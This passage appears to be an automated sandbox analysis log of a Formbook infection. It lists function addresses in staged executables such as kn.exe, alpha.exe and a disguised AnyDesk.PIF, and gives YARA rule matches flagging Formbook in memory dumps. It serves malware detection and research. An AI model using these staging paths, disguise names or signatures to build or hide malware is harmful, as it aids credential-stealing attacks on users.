          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854318307_2_00007FF685431830
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C38207_2_00007FF6854C3820
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854877C87_2_00007FF6854877C8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854517D47_2_00007FF6854517D4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547D7F07_2_00007FF68547D7F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C52907_2_00007FF6854C5290
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854ED2B47_2_00007FF6854ED2B4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A53187_2_00007FF6854A5318
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854792C47_2_00007FF6854792C4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68541F2C07_2_00007FF68541F2C0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546D2C07_2_00007FF68546D2C0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854892D87_2_00007FF6854892D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549F1687_2_00007FF68549F168
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854611C87_2_00007FF6854611C8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542D1B87_2_00007FF68542D1B8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854631E07_2_00007FF6854631E0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C94947_2_00007FF6854C9494
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855094A87_2_00007FF6855094A8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854774787_2_00007FF685477478
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854354A07_2_00007FF6854354A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854154387_2_00007FF685415438
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68545D4407_2_00007FF68545D440
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BD4607_2_00007FF6854BD460
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548F5207_2_00007FF68548F520
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E14F07_2_00007FF6854E14F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854FB3AC7_2_00007FF6854FB3AC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854473407_2_00007FF685447340
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543B36C7_2_00007FF68543B36C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548D4107_2_00007FF68548D410
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854173F87_2_00007FF6854173F8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68545F4347_2_00007FF68545F434
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855033D07_2_00007FF6855033D0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855133D47_2_00007FF6855133D4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549DEB07_2_00007FF68549DEB0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546DEA47_2_00007FF68546DEA4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549BE707_2_00007FF68549BE70
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A5F047_2_00007FF6854A5F04
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685461ED07_2_00007FF685461ED0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685499EE47_2_00007FF685499EE4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68551DD847_2_00007FF68551DD84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854ABDA07_2_00007FF6854ABDA0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685469D6C7_2_00007FF685469D6C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C7D707_2_00007FF6854C7D70
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685471D707_2_00007FF685471D70
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685445DF77_2_00007FF685445DF7
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A1E2C7_2_00007FF6854A1E2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685421DE87_2_00007FF685421DE8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E20847_2_00007FF6854E2084
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854480807_2_00007FF685448080
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547C0B87_2_00007FF68547C0B8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685411F807_2_00007FF685411F80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C9FF87_2_00007FF6854C9FF8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854780187_2_00007FF685478018
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685427AB47_2_00007FF685427AB4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548BA487_2_00007FF68548BA48
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685443A407_2_00007FF685443A40
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C9A587_2_00007FF6854C9A58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685461A607_2_00007FF685461A60
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DBB287_2_00007FF6854DBB28
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685477AC87_2_00007FF685477AC8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549F9907_2_00007FF68549F990
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854919AC7_2_00007FF6854919AC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6855079387_2_00007FF685507938
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68550994C7_2_00007FF68550994C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685411A107_2_00007FF685411A10
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543F9B87_2_00007FF68543F9B8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685491C907_2_00007FF685491C90
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68551FC907_2_00007FF68551FC90
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542BCA47_2_00007FF68542BCA4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685463C607_2_00007FF685463C60
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685425D087_2_00007FF685425D08
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544DD207_2_00007FF68544DD20
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685449CD07_2_00007FF685449CD0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D9CC07_2_00007FF6854D9CC0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546BCE87_2_00007FF68546BCE8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685481B847_2_00007FF685481B84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68541FB847_2_00007FF68541FB84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685415BA47_2_00007FF685415BA4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BFB507_2_00007FF6854BFB50
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A7B747_2_00007FF6854A7B74
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C3C107_2_00007FF6854C3C10
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546FC347_2_00007FF68546FC34
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544FC207_2_00007FF68544FC20
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685439BC87_2_00007FF685439BC8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547DBF07_2_00007FF68547DBF0
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D420C410_2_02D420C4
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D9BDF410_2_02D9BDF4
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942AA5411_2_00007FF6E942AA54
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E943555411_2_00007FF6E9435554
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9428DF811_2_00007FF6E9428DF8
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E943785411_2_00007FF6E9437854
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942341011_2_00007FF6E9423410
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E94337D811_2_00007FF6E94337D8
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E944EE8811_2_00007FF6E944EE88
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942E68011_2_00007FF6E942E680
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942D25011_2_00007FF6E942D250
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9429E5011_2_00007FF6E9429E50
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942765011_2_00007FF6E9427650
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942524011_2_00007FF6E9425240
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9430A6C11_2_00007FF6E9430A6C
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9447F0011_2_00007FF6E9447F00
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942372C11_2_00007FF6E942372C
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9426EE411_2_00007FF6E9426EE4
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E945153811_2_00007FF6E9451538
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942CE1011_2_00007FF6E942CE10
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9424A3011_2_00007FF6E9424A30
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E944AA3011_2_00007FF6E944AA30
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942222011_2_00007FF6E9422220
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E943422411_2_00007FF6E9434224
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E94281D411_2_00007FF6E94281D4
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E944D9D011_2_00007FF6E944D9D0
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942188411_2_00007FF6E9421884
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E944AC4C11_2_00007FF6E944AC4C
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9422C4811_2_00007FF6E9422C48
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942851011_2_00007FF6E9428510
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9427D3011_2_00007FF6E9427D30
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E94318D411_2_00007FF6E94318D4
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E942B0D811_2_00007FF6E942B0D8
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9423F9011_2_00007FF6E9423F90
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9429B5011_2_00007FF6E9429B50
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9425B7011_2_00007FF6E9425B70
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E944AFBC11_2_00007FF6E944AFBC
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9426BE011_2_00007FF6E9426BE0
          Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF6E9433448 appears 54 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68544BC9C appears 280 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6854AEB98 appears 93 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6855264A6 appears 173 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6854D7BAC appears 34 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68541D1C8 appears 41 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6854D7D70 appears 35 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6854D0D10 appears 181 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6854CABFC appears 818 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68551F1B8 appears 183 times
          Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68551F11C appears 37 times
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D44500 appears 33 times
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D44860 appears 949 times
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D446D4 appears 244 times
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D589D0 appears 45 times
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D444DC appears 74 times
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D5894C appears 56 times
          Source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
